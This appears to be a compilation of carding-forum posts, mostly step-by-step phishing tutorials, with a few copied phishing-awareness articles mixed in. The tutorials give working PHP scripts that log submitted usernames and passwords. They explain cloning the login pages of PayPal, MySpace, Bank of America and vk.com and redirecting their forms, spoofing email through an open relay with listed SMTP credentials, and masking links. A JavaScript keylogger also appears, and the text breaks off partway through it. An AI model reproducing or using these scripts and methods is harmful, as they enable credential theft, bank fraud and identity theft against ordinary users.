Basic Phishing Tutorial

[Carding Forum]

Today I will write for something very powerful in hacking phishing this is the one of the most illegal techniques in hacking.
!I'm not responsible for your actions I write this for education purpose only if you get in to trouble I'm not responsible! Phishing is highly illegal so if you are new to hacking I will recommend first to do other stuff like RATing and keylogging then phishing.
When you are phishing you have to highly protect your self.

First you need to sing up in very secure hosting. That won't get you in trouble I can't recommend you but after short search on internet I found some.

cwahi - http://cwahi.com 110mb - http://110mb.com Ripway - http://ripway.com
SuperFreeHost - http://superfreehost.info Freehostia - http://freehostia.com Freeweb7 - http://freeweb7.com
t35 - http://t35.com
Awardspace - http://awardspace.com PHPNet - http://phpnet.us
Free Web Hosting Pro - http://freewebhostingpro.com ProHosts - http://prohosts.org
FreeZoka - http://www.freezoka.com/ 000webhost - http://000webhost.com/ AtSpace - http://atspace.com

I can't assure that those hosting are secure and there aren't Federals ! Those are free hostings. I haven't found paid but I thing that they are more secure.

So when you have found hosting its time to create phishing pages.

Let's say you have target Paypal (I won't recommend to target it when you don't have experience) you will need login from there to get them there are 2 ways.

1. To use tool called Phish Creator -https://www.youtube.com/watch?v=xoTHvHQsroA
I don't know is it backdoored or not.
For linux users -
2. To do it manually.

Ok go to Paypal login page(in our case if you are going to phish Facebooks go to Facebook login page) and save it. Now you should create script that will record all variable write in the page I can't help you here.

kidding open editor(notepad for example) and write this script.

<?php

header("Location: paypal.com");
$handle = fopen("accs.txt", "a"); foreach($_GET as $variable => $value)
{
fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n"); fclose($handle);
exit;
?>

Paste this and edit where is needed then save this will save all accs to accs.txt. Now you should link this page to the save you have save earlier.
Open saved login page with editor and find "action=" and change it with page you have create (copy).
Example:

action="https://www.paypal.com/bg/cgi-bin/webscr?cmd=_login- submit&dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33"

will become

action="https://www.your-hosting.com/your-file"

What you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original page.

You are ready now its time to start spreading your link. I'm not the best in this section but I can help.
E-mail Spam - This is highly illegal too. But in our case we attack paypal so lets spoof the email to paypal admins and send email in which we say that there is update to the system and they need to enter their information again.
- Belive or not this is very effective way.

 

[Carding]

What is a phishing attack

Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers. It occurs when an attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message. The recipient is then tricked into clicking a malicious link, which can lead to the installation of malware, the freezing of the system as part of a ransomware attack or the revealing of sensitive information.

An attack can have devastating results. For individuals, this includes unauthorized purchases, the stealing of funds, or identify theft.

Moreover, phishing is often used to gain a foothold in corporate or governmental networks as a part of a larger attack, such as an advanced persistent threat (APT) event https://www.imperva.com/learn/application-security/apt-advanced-persistent-threat. In this latter scenario, employees are compromised in order to bypass security perimeters, distribute malware inside a closed environment, or gain privileged access to secured data.

An organization succumbing to such an attack typically sustains severe financial losses in addition to declining market share, reputation, and consumer trust. Depending on scope, a phishing attempt might escalate into a security incident from which a business will have a difficult time recovering.

Phishing attack examples

The following illustrates a common phishing scam attempt:

• A spoofed email ostensibly from myuniversity.edu is mass-distributed to as many faculty members as possible.
• The email claims that the user’s password is about to expire. Instructions are given to go to myuniversity.edu/renewal to renew their password within 24 hours.

Several things can occur by clicking the link. For example:

• The user is redirected to myuniversity.edurenewal.com, a bogus page appearing exactly like the real renewal page, where both new and existing passwords are requested. The attacker, monitoring the page, hijacks the original password to gain access to secured areas on the university network.
• The user is sent to the actual password renewal page. However, while being redirected, a malicious script activates in the background to hijack the user’s session cookie. This results in a reflected XSS attack https://www.imperva.com/learn/application-security/reflected-xss-attacks, giving the perpetrator privileged access to the university network.

Phishing techniques

Email phishing scams

Email phishing is a numbers game. An attacker sending out thousands of fraudulent messages can net significant information and sums of money, even if only a small percentage of recipients fall for the scam. As seen above, there are some techniques attackers use to increase their success rates.

For one, they will go to great lengths in designing phishing messages to mimic actual emails from a spoofed organization. Using the same phrasing, typefaces, logos, and signatures makes the messages appear legitimate.

In addition, attackers will usually try to push users into action by creating a sense of urgency. For example, as previously shown, an email could threaten account expiration and place the recipient on a timer. Applying such pressure causes the user to be less diligent and more prone to error.

Lastly, links inside messages resemble their legitimate counterparts, but typically have a misspelled domain name or extra subdomains. In the above example, the myuniversity.edu/renewal URL was changed to myuniversity.edurenewal.com. Similarities between the two addresses offer the impression of a secure link, making the recipient less aware that an attack is taking place.

Spear phishing

Spear phishing https://www.imperva.com/learn/application-security/spear-phishing/ targets a specific person or enterprise, as opposed to random application users. It’s a more in-depth version of phishing that requires special knowledge about an organization, including its power structure.

An attack might play out as follows:

1. A perpetrator researches names of employees within an organization’s marketing department and gains access to the latest project invoices.
2. Posing as the marketing director, the attacker emails a departmental project manager (PM) using a subject line that reads, Updated invoice for Q3 campaigns. The text, style, and included logo duplicate the organization’s standard email template.
3. A link in the email redirects to a password-protected internal document, which is in actuality a spoofed version of a stolen invoice.
4. The PM is requested to log in to view the document. The attacker steals his credentials, gaining full access to sensitive areas within the organization’s network.
By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of an APT.

Hope this article helpful for you. Thank You.

Disclaimer:

The Article writer’s intent is to spread awareness about Technology. The writer is not responsible if any damage occurs. This is for educational purpose only.

(c) https://hackonology.com/blogs/phishing/

 

[Carding]

This is a basic tutorial on how to make a phishing page.

Index:
What is a phisher?
Making a T35 Account
Getting Web pages Source Code
Creating Phish File
How to fool people


What is a phisher?

A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.

Making a T35 Account

In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07.

Getting Web Pages Source Code

After you create that page, go to the website you will make a phisher for. Open the login page, From there right-click the page, and click View Source. Copy and paste what has popped-up.

Creating Phish File

Once you have that copied, go to your T35 account. Click on "New File" Title it login.htm Then paste your Source Code you copied from 104. Save it.

Now create another file, title it fhish.php And inside, paste this code:

<?php
 header("Location: http://www.phisshed-website.com");
 $handle = fopen("thepasses.txt", "a");
 foreach($_GET as $variable => $value) {
 fwrite($handle, $variable);
 fwrite($handle, "=");
 fwrite($handle, $value);
 fwrite($handle, "\r\n");
 }
 fwrite($handle, "\r\n");
 fclose($handle);
 exit;
 ?>

The http://www.phisshed-website.com is what the page goes to after the victim logs in, change that to what desired

Save the file.

Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!

How to fool people

What you do now is disguise your link. Use this code:

T35acount.spam.com/login.htm

That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.

* real website name*.com/login.php

You do the same for any forum!

Thank you for reading! Hope it helps! If i was missing something, or you have any questions, PM me!

ALTERNATIVES:

Also, if you don't want to use spam.com, use ripway.com and after you uploaded everything, go to http://www.dot.tk and choose a free .tk domain name.

 

[Carding]

What is Phishing
Phishing is a method of identity theft carried out through the creation of a fraudulent website, email or text appearing to represent a legitimate firm. A scammer may use a fraudulent website that appears on the surface to look the same as the legitimate website. Visitors to the site, thinking they are interacting with a real business, may submit their personal information, such as social security numbers, account numbers, login IDs and passwords, to this site. The scammers then use the information submitted to steal the visitors money, identity or both, or sell the information to other criminal parties.

Phishing may also occur in the form of emails or texts from scammers that are made to appear as if they are sent from a legitimate business. These fake emails or texts may install programs like ransomware that can allow scammers to access a victim's computer or network.

What Is Phishing?

BREAKING DOWN Phishing
Phishing scammers create a false sense of security for their targets by spoofing or replicating the familiar, trusted logos of well-known, legitimate companies, or they pretend to be a friend or family member of their victims. Often, the scammers attempt to persuade victims they need personal information urgently, or the victim will experience a severe consequence, such as frozen accounts or personal injury.

A classic example of phishing is an identity thief setting up a website that looks like it belongs to a major bank. Then, that thief sends out many emails that claim to be from the major bank and request the email recipients to input their personal banking information (such as their PIN) into the website so the bank may update their records. Once the scammer gets a hold of the needed personal information, they attempt to access the victim's bank account.

Protecting Yourself from Phishing Attacks
The following highlights signs of phishing, and how to protect yourself.

1. Exceptionally good deals or offers. If an email touts offers that are too good to be true, they probably are. For example, an email claiming you've won the lottery or some other lavish prize may be luring you in to get you to click a link or relay sensitive personal information.
2. Unknown or unusual senders. Though phishing emails may look like they originate from someone you know, if anything seems out of the ordinary, be cautious. When in doubt, hover over the email address of the sender to ensure the email address matches the email address you expect. Place a phone call to the company if you are unsure of an email or website. Don't respond to emails with any personal information.
3. Hyperlinks and attachments. These are particularly concerning if received from an unknown sender. Never open links or attachments unless you are confident they are from a safe sender. Type in the link address rather than clicking the link.
4. Incorrect spelling in the web address. Phishing sites often use web addresses that look similar to the correct site, but contain a simple misspelling, like replacing a "1" for an "l".
5. Immediate pop-ups. Be wary of websites that immediately display pop-up windows, especially those asking for your username and password. Use two-factor authentication, a browser with anti-phishing detection and keep security on your systems up-to-date.

(c) https://www.investopedia.com/terms/p/phishing.asp

 

[Carding]

Phishing is a method of online fraud. With its help, cybercriminals try to lure confidential data from a person or force him to take any unwanted actions. For this purpose, scammers use instant and mail messages, specially crafted fake websites.

The main task of phishers is to obtain passwords and logins for financial services (online banks, electronic money systems) or trick the victim into paying them money. To do this, you need to induce a person to perform a certain action: for example, go to an infected site or open a malicious file. This is often how ransomware viruses spread.

A phishing link leading to a malicious page may come from a friend or relative whose computer has been infected. This greatly increases the likelihood of going through it, since people usually trust their acquaintances. This is how the attack propagates through the network along a chain from victim to victim.

A phishing site is usually a fake resource (imitation of a well-known legitimate service), where the user is prompted to enter confidential data - for example, allowing them to write off money from a bank card or gain access to money in an online bank.

To increase the effectiveness of attacks, fraudsters use methods of influence that are in the field of psychology and related to social engineering. They usually affect the fears, emotions, reflexes and feelings of the potential victim.

When you go to a phishing site, the following scenarios are possible:
1. An exploit installed on a phishing web page will work. It uses one of the vulnerabilities of the victim's computer to inject a malicious program.
2. A malicious file will be downloaded and launched from the link.
3. The victim will independently enter and submit their confidential data through a fake authorization form or other similar element.

In the first and second cases, after being infected with a malicious program, the victim's computer may be blocked, the files encrypted, and the attackers will start extorting money to restore access.

Classification and examples of phishing attacks

Here are some examples of phishing techniques used by scammers to hijack email accounts:

1. E-mail will be blocked soon: some wrong action was taken, now you need to urgently fix the error, otherwise your e-mail address will be blocked.
2. You are blacklisted: a blacklisted message that requires you to be verified and confirm that you are not a robot.
3. Notice of documentation: the accounting department of the partner company has sent you an invoice, which you need to urgently review. In business correspondence, especially when there is a huge stream of letters, the victim can click on the document by visiting a phishing page.
4. About exceeding the quota: you need to increase the volume of your mailbox due to its fullness.
5. About changing your password: your mail has been hacked by scammers, you need to change your password urgently.
6. About spam: spam is sent from your address, and now you will not be able to send letters. You must go through the verification process.

One way or another, all these techniques lead to the same result: the victim goes to a site that imitates the interface of a mail service and enters a username and password, which are sent to the attacker.

Object of influence

Most often, scammers choose victims among users of electronic payment systems, auctions, and online banks. Attackers are interested in personal information that gives access to finance. They can also hijack an email account that is used in financial services to change and recover passwords.

The victims are sent letters allegedly from banking institutions or authorities. Users have no idea about anything, go to a copy of the official website and without fear enter personal data, which immediately becomes available to attackers.

Source of threat

Phishers' technologies are constantly improving. For example, such a concept as "farming" has recently appeared. With the help of malicious programs, scammers make changes to the system hosts file, after which the victim's computer is automatically redirected to false sites - exact copies of the original ones. This substitution is difficult for even experienced users to detect.

The most popular targets of phishers are Sberbank, Ebay, PayPal and other financial institutions. Attackers attack both accidentally and purposefully. In the latter case, the attacker finds out which banking institution or provider is the client, which payment system, etc. is the victim. This technology is more laborious and costly for phishers, but it yields a record number of successful attacks.

Risk analysis

There are a variety of ways to combat this type of scam. We are talking about both legislation and technology. To defend against phishing, the user must be extremely careful. Here are some tips to help keep yourself safe from phishing:

1. It is necessary to check the spelling of the domain from which the letter came: whether the domain is written correctly, whether there is a substitution.
2. If the site has not aroused suspicion, then you should check the page indicated in the message on a special resource - for example, virustotal.com. The site may be infected.
3. Verification of the site's digital certificate will be required.
4. See if there are any typos in the text of the letter or any strange design. Reputable organizations will not allow themselves to do this.
5. Use security software that has web antivirus and web filters for malicious and suspicious addresses in your arsenal.
6. In case of any suspicion, it is better to delete the message and manually go to the web resource of the organization indicated in it, contact customer service by phone (the basis for the success of phishing is the user's gullibility).

Another type of fraud prevention is to create a list of phishing sites that you can refer to in the future. Some popular browsers are equipped with a similar system. There are also special extensions and add-ons for web browsers that provide the corresponding service.

Several years ago, a method of protection against phishing appeared using special DNS services that block transitions to dangerous sites, regardless of the browser. But the most promising is the method of "whitelisting" in some antivirus programs, when at the slightest suspicion of substitution or unreliability, access to the site is blocked. This approach has proven effective for online banking and payment sites.

Unfortunately, phishing will continue to be popular due to the depth of its social engineering techniques. Therefore, anyone, even the most prepared person, with the right approach, can become a victim of phishing.

 

[Carder]

1. Intro
There are couple of other phishing tutorials available , but some people might find it to sophisticated to understand.

This phishing tutorial would be codified in beginers language/so as to facilitate easy understanding, but if you have problems understanding it, then you need to get some beginner level computer knowledge first.

2. What then is a phisher?

Phisher looks like a login page (a fake login page), that writes the username and the password to a file, or does whatever you want.

All you need is a web hosting service with PHP enabled.
We will use t35. Go to www. t35. com (remove spaces) and sign up for a free account.

Whenever I write something like www. t35. com, you should remove the spaces inbetween.

I'm doing it cause the link for t35 is censored on hackforums.

In this tutorial, we will make a phishing site for Myspace (the procedure is equivalent for most of the sites).

While not signed in myspace, open anyone's profile and click on his picture.
That will lead you to Myspace's login page that has the red box with "You Must Be Logged-In to do That!"

Now, click File>
Save Page As, and save the myspace page to your Desktop.
Open your saved page with any text editor (notepad, wordpad etc).

Select all of the text (the source code), and copy it.

Go back to your t35 account and click on 'New File', delete the text that will be there by default, and paste the Myspace's source code there.

Name the file 'index.php '(without the''), and save it.

I need atleast 100 people to make money this week will be waiting for all testimonies so u drop all testimonies here after this tut.
I have posted all this tut before but posting it again for the new members and noobs.

Now let's continue.

Now you have made a page equal to Myspace.

Everything on that page will have the same function as if it were on the original site.

The link to your phish site will be ' t35.com/index.php' - where 'xxx' is the name of your account. You can name it anyhow.

But there is a little problem.

When someone enters his username and password and press login, it logs him into the real myspace.

What do we need to change?

What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.

Open your 'index.php' file.

Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc).

We need to find the 'action=some link' that refers to the Login button.

After some searching, we find the:

<h5 class="heading">
Member Login
</h5>
<form action="" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVB vc3RCYWNrS2V5X18WAgUwY3RsMDAkT WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWN rYm94BTBjdGwwMCRNYWluJFNwbGFza ERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24=" />
</div>

and we know that 'action="' refers to the login button.

Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'file.

Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'login.php' file on your site
(which doesn't exist yet).

All we have to do now, is to create a 'login.php' file that contains a function that writes down the username and password into a text document.

Make another file named 'login.php'
(without the quotes)
and paste the following code in it:

<?php
header ('Location: MySpace | Login ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);

exit;
?>

The function of login.php is simple. It opens a file named 'passwords.txt'
(and creates it if it already exist)
and enter the informations there
(the username and password).

?Congratulations! You have a phisher! Superman?

The link to your phish site is:

t35.com/index.php -where 'xxx' is your account name.

The link to your text file is:

t35.com/passwords.txt

Or you may access it from your account.

Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the .php and .txt must stay the same.

4. How to trick people to fall for it.

There are hundreds of ways how to do that, your creativity is your limit.

Most common way is to make an email similar to the admin, and sending them some report with a link to log in the site(your phish site).
Ofcourse you will mask the link.

How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing this:

The Original Site Link

For example, Google looks like a google, but it can leads you to yahoo when you click it.

link%20of%20the%20image

When sending emails see for the option 'hyperlink', and it's self explainable once you see it.

Summarily, This tutorial explains how to make a phisher, and how it works.
Although is written for Myspace, the procedure is equivalent for almost every other login site (for hotmail is different).
After this, it's up to you to explore, experiment and dive in the world of social engineering.

ALSO NOTE THE ABOVE TUTORIAL IS JUST A SEGMENT OF SPAMMING, A MORE SOLID KNOWLEDGE IN SPAMMING WOULD BE REQUIRED FOR MORE EFFICIENT RESULT

If you're making the phisher for myspace, and want to get random people to it, you can simply make some hot chick account and put some hot pic that will lead to your phish site when clicked.
So when they click the lusty image, they will be led to your phish site telling them they need to log in to see that.

????????

Phishing is the attempt to acquire sensitive information by disguising itself as a known and trusted entity in the world of electronic communication.

Types Of Sensitive Information

✦ Login Credentials (Email / User / Pass)
✦ Credit Cards
✦ Identity (Driving License Documents)
✦ Health Information
✦ Accounts like: Steam, Bitcoin Wallet etc.

3 Types Of Usual Attacks

➸ Phishing - usually with a specific goal and to receive money

➸ Spear phishing - specific goals or groups

➸ Whaling - specific on a single person

Phishing Process

Reconnaissance (e.g. E-Mail, Position in the Company, Systems, Log-in Page etc.)

➣ Information Gathering
➣ Large companies potentially buy email on black market
➣ Start testing to correct future attacks
➣ Active and passive information gathering for vulnerabilities

Survey Tools:
✦ Metagoofil (https://tools.kali.org/information-gathering/metagoofil)
✦ Maltengo Radium (https://www.maltego.com/downloads/)
✦ Net Glub (http://redmine.lab.diateam.net/attachments/download/1/netglub-1.0.tar.gz)
✦ Recon-ng (https://github.com/lanmaster53/recon-ng)
✦ TheHavarester (https://github.com/laramies/theHarvester)

Setup and deploy (organization of systems useful to our goal)

✦ Domain Registration (https://www.godaddy.com)
✦ Mass Mailer (DM @TheMasterCH) ?
✦ Open Relays For The Domain Target
✦ Web Server Setup
✦ Website Cloning
✦ Web Application Development
✦ Malicious Attachments / Malware Payloads
✦ Browser Exploits

Read Also: What is Open Relay https://www.techopedia.com/definition/1699/open-relay

Test verything before sending you will not have a second chance (send first to own mail, use protonmail, gmail with anti spam detection).

Collect responses / organize them

Test your credentials:

Make other phish attacks from trusted account,
connect them to a botnet / shells and persist
increase your privileges.

Draw up a report do it for exercise and to keep everything tidy

--------------------------------------

Let's get to work

We identify our goal and fully carry out point one

Clone the website for hosting:

$ wget -r https://URL

URL = Your URL

$ wget -r https://bankofamerica.com

Start fixing the cloned site:

$ sudo cp -r -v bankofamerica.com/index /var/www/html
$ sudo nano /var/www/html/index.html

This attack to be functional we need to register user and pass of the various users, we can write a short php script to collect all the variables (like user / pass)
-------------------------------------------

<?php
$user = &_POST['_user'];
$pass = &_POST['_pass'];

$f = fopen("collect.txt", "a");
fwrite($ f, "$user: $pass \ n");
fclose();

header("Location: https://localhost/index.html");
die();
?>

-------------------------------------------

We register username and password:

$ user = & _POST ['_ user'];
$ pass = & _POST ['_ pass'];

We save them in collect.txt

$ f = fopen ("collect.txt", "a");
fwrite ($ f, "$ user: $ pass \ n");
fclose ();

We refer them to the original site

header ("Location: https://localhost/index.html");
die ();

Edit the localhost with your server name (Phishing Website)

$ service apache2 start

Type on firefox localhost/index.html and you can see your website. I will talk soon about setting up a phishing page with own login and making a amazon phishing site or so on.

---------------------------------------------

So as we set up the script the copy of the website the script would not work, so we have to go to the cloanate site and change the form.

<form> original

<form name="form" action="index.html" method="post">

working <form>

<form name="form" action="form.php" method="post">

--------------------------------------------------

So once we have created the site and found a way to collect the data we have to set up a server and finally test our attacks.

So here we have the right set of permissions for our web page

$ sudo chown www-data /var/www/ -R

$ service apache2 restart

Now testing the page we created we go to check:

$ cat /var/www/html/collect.txt

for example: lol / user iMbid / pass

Once tested that this works we go back to the reconnaissance phase

Mail server

We must understand how to send phishing e-mail.

During a vulnerability scan we will find that the mail server to an open relay that will allow us to impersonate a specific user.

So using telnet we will build the email for our goal.

In which we will impersonate a known and privileged user, who asks another known and privileged user to test the new performances of a specific private section

-------------

We are using SMTPs for this section ex:

webmail.gamewood.net:587,gin4fred@gamewood.net,srcosth

SMTP Server : webmail.gamewood.net
Port : 587
Mail : gin4fred@gamewood.net
Password : scrcosth

$ telnet webmail.gamewood.net 587
$ EHLO webmail.gamewood.net
$ MAIL FROM: no-reply@amazonl.com
$ RCPT TO: john-smith@gmail.com
$ DATA
$ SUBJECT: Webmail Site Update

We are currently testing a new performance configuration for the webmail site, please test the site change by visiting: https://rec.amazon.com/index.html (our crafted url)

Thanks
.
$ quit

------------------

Attack tools - Make the job easier

✦ SET (https://github.com/trustedsec/social-engineer-toolkit)
✦ Phishing Frenzy (https://github.com/pentestgeek/phishing-frenzy)
✦ beEF (https://github.com/beefproject/beef)

SET the best, completed tool of social engineering attacks

beEF is normally used as part of the attack to learn more information

Phishing Frenzy is like SET and very nice

Speedphish Framework - SPF

✦ Passes for all initial work points
✦ Automatic tasks useful to perform a phishing attack
✦ Written in python
✦ Complete or partial automation
✦ Can be configured with external tools if available

Features:
➣ Collects email addresses from internet
➣ Setup & host website
➣ Send phishing e-mail to our target
➣ Keylogger
➣ Create reports

Installation:

$ sudo apt-get install git build-essential python-dev python-pip phantomjs -y
$ sudo apt install python3-twisted
$ sudo apt install python3-dnspython
$ git clone https://github.com/tatanus/SPF
$ cd SPF
/spf
$ ./spf.py -h

Important give a delay to:

--test
--all

The suggestion is to run --test first and check all the work and that it is perfect

Let's take a look at the config:

We can set up the server that sends email
If we try to run

./spf.py --test -d example.com

Will tell us that it is using the settings in the default.cfg (we can also have multiple.cfg files)

Is trying to find emails linked to the website
at the end of the process he will tell us that for example 41 emails have been found linked to our target.

Then tool will start phishing on the webserver looking for template we will edit the templates
you will find us e-mail template then it will start sending emails

Finally, it will monitor the phishing website activity we will see all the activities on our templates and pressing ctrlc will stop the webserver generating the report.

Of course if we have not collected anything it is not convenient to interrupt the webserver.

VIDEO TUTORIAL:

 

[Carding 4 Carders]

Basic phishing tutorial​

I will give you a basic phishing tutorial here:

First you need to sing up in very secure hosting.
So when you have found hosting its time to create phishing pages.

Let's say you have target Paypal (I won't recommend to target it when you don't have experience ) you will need login from there to get them there are 2 ways.

1. To use tool called Phish Creator V 2.0 Download link - http://mir.cr/24LYFA63
I don't know is it backdoored or not.
For linux users - 2.To do it manually.

Ok go to Paypal login page(in our case if you are going to phish Facebooks go to Facebook login page) and save it.
Now you should create script that will record all variable write in the page

<?php
header("Location: paypal.com");
$handle = fopen("accs.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Paste this and edit where is needed then save this will save all accs to accs.txt.
Now you should link this page to the save you have save earlier.
Open saved login page with editor and find "action=" and change it with page you have
create (copy).
Example:

action="https://www.paypal.com/bg/cgi-bin/w...63663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33"

will become

action="https://www.your-hosting.com/your-file"

What you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original page.

You are ready now its time to start spreading your link .

E-mail Spam - This is highly illegal too. But in our case we attack paypal so lets spoof the email to paypal admins and send email in which we say that there is update to the system and they need to enter their information again.
- Belive or not this is very effective way.

 

[Jollier]

How to create phishing sites that are used to steal passwords
Disclaimer: The article is provided for informational purposes only! I am not responsible for your actions.

Technically, the process can be divided into two simple steps:
1.Preparing a copy of the site
2. Finding a way to get the victim to go to a fake site.

Let's go back to the theory, phishing is a very profitable topic. Using phishing, you can perform both mass hacks and targeted hacks. In fact, you just need to think through a scheme - how to confuse people and so that they go to your fake site and enter their data. Here, oddly enough, everything is decided by social engineering, but more on that later...

Let's start by creating a clone of the site:
The site's appearance is set by html, and interactive elements on the page are controlled by JavaScript. The site code may also contain links to third-party resources, such as images, audio files, etc. So to create a copy, it is not enough just to copy the entire page code, you need to transfer third-party resources as well or forward links to them. In addition, we need to change the logic of the application so that data is sent to our server and stored there.

For an example, let's try to create a replica of the site of the Mail authorization page. Her address https://account.site.com/login to view the source code of the page in firefox, just press the key combination Ctrl+U. But we don't need to manually copy everything and save all the images: Linux has a simpler solution. In the console, enter the command wget --page-requires --convert-links https://account.site.com/login

After that, a folder will appear in the folder where the console was opened account.mail.ru which will contain the login file. If you open it in a browser, you will see the same image as on the mail login page. Now you need to create a server on which this page will be stored. For the test, we will create it locally, but the configuration process on the local server will be almost the same. Making sure that the web server is working. To do this, go to the page in the browser

http://127.0.0.1/

If nothing is displayed, you need to restart the web server with 2 commands :

• source /etc/apache2/envvars
• systemctl restart apache2

After the welcome page is displayed, you need to copy the files downloaded by wget to the server folder. To do this, go to /var/www / html/ and transfer the previously downloaded login file there.

Now we go to the browser at login and the authorization page is displayed, then it is already stored on our server. Now you need to implement the password saving function.to do this, open the login file in a text editor and find the page where user data is sent(the action parameter is responsible for this). To do this, press ctrl+F and type action="https://auth.mail.ru/cgi-bin/auth"

Changing the found text to action="auth.php".

Then create a new file in the login folder auth.php. Open it with a text editor and write there

• <?php
• fileputcontents('log/login_llog.txt', "Username: ".$ST['Username']." Password: ".$_POSPOST['Password'].'\n', FILEND);
• ?>

file_put_contents function for writing data to a file, log/login_log.txt - path to the file. $_POST['Username'] is the user name from the form, and $_POST['Password'] is the password. FILE_APPEND indicates that the file does not need to be overwritten each time, and new data is added to the end.

Now you need to create a folder where the data will be saved. To do this, in the folder in login, right-click in an empty place and select Open in terminal.

In the window that appears, enter:

• mkdir log
• chmod 777 log

That's all, now the username and password entered in the form will be saved on our server. And so that the victim does not suspect anything, we will redirect her to the mail site with a login error.

To do this, go to auth.php before ?>> add a line and enter it there:

• header('Location: https://account.site.com/login?fail=1');

In General, nothing complicated and everything is ready. Trying to log in to

http://127.0.0.1/login

and enter your username and password there. We will be redirected to the real mail site with a login error, and the data that the user entered will be saved in the file /var/www/html/log/login_log.txt

 

[Hacker]

Today I suggest you go fishing =) The topic of phishing will never be outdated and will not die. This is one of the few ways to get 99% results.

I will show how ready-made solutions for this type of attack work, such as settoolkit, morpheus, but in this article, I want to teach you how to understand the site structure and understand how to rewrite it for yourself, in my case, how to make logs and passwords fall on the server, and also when you click on the Log in button, users are transferred to the off-site vk.

Earlier, we considered one of the ways to find vulnerable routers, on which you can later change the primary DNS address by installing your own, and redirect traffic to the sites we need. There are a few nuances that some of you are not yet ready for. Which hosting to choose, how to raise a DNS server on it, how to write a site identical to the original and how much money is needed for this=). And besides, not every router has a default log and pass in the admin panel, this is a real harsh world =) You have to improvise on the fly, as they say.

Actually apache2 or nginx... here everything is individual, to whom that is closer. I had some difficulties to set up nginx and php7, I freaked out, demolished php7 and installed php5. 6 and everything worked fine. But I'm not a sysadmin and I don't know all the subtleties ). But with apache2, everything worked fine.

Okay, let's get down to business. Where to get a website, for example vk.com. Here, in fact, everything is not difficult, you can just copy it. But the trouble is, if you just copy-paste the source code of the page, we will get such nonsense. By the way, ready-made solutions like settoolkit and morpheus will also be copied =(

Not presentable...and maybe someone will fall for it.

We will clone the site, or rather its welcome page. To do this, we will use httrack. In fact, this program is unique, it can copy both the entire site and its individual parts.

The simplest way to run this program will look something like this: httrack vk.com -O / var / www / html, but for vk I sincerely do not advise you to do this, because copy the entire vk...this is a great idea =) This is more often done on smaller sites for a complete analysis of the structure, all folders and files. I think in the future we will analyze all its features. But at this stage, we will act according to a different scenario.

First, you need to use the parameter for entering the user agent, which can be viewed at the link here =)

Accordingly, we will use the-F parameter Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36

Next, we will need the-r2 parameter to copy only one page.

So, let's put everything together and get httrack https://vk.com -r2-F Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36-O "/var/www/html/vk.com" and you get the following:

The site will be copied. In the folder vk.com there will be several files that httrack made, you can delete them and leave only one folder vk.com

Delete and move files from the subfolder vk.com to a folder vk.com higher and then we will not have the path localhost/vk.com/vk.com in the address bar

After manipulating the files, the address will be localhost/vk.com

With the web version, everything is clear. But if you try to copy the mobile version m.vk.com if you encounter some difficulties, javascript checks the validity of the address and does not allow the page to load. And don't forget to change the user agent for the mobile version =)

The command will look like this

httrack https://m.vk.com -r2 -F "Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build/IML74K) AppleWebkit/999+ (KHTML, like Gecko) Safari/999.9" -O "/var/www/html/mvk/"

When the site is copied and you try to go to it, you will fail = (so run the command

nano /var/www/html/mvk/m.vk.com/index.html and delete the selected image

And the site works fine.

Great! We have sites that are identical to the original ones. But the logs are not saved anywhere, and we will not be able to see who entered what in the fields, so let's start web programming =)) Today we will implement keylogger in our website and write it in php and javascript. It's just fun really ) In the following articles, we can rewrite the fill-in forms so that logs and passes are filled out separately, but there are a lot of such video manuls, so I decided to play around with the keylogger. We will edit it vk.com

From words to deeds. Creating 3 files keylogger.php, keylogger.js and keylog.txt =)

In keylogger.php enter:

<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>

In keylogger.enter js:

document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)
http.open("POST","keylogger.php",true);
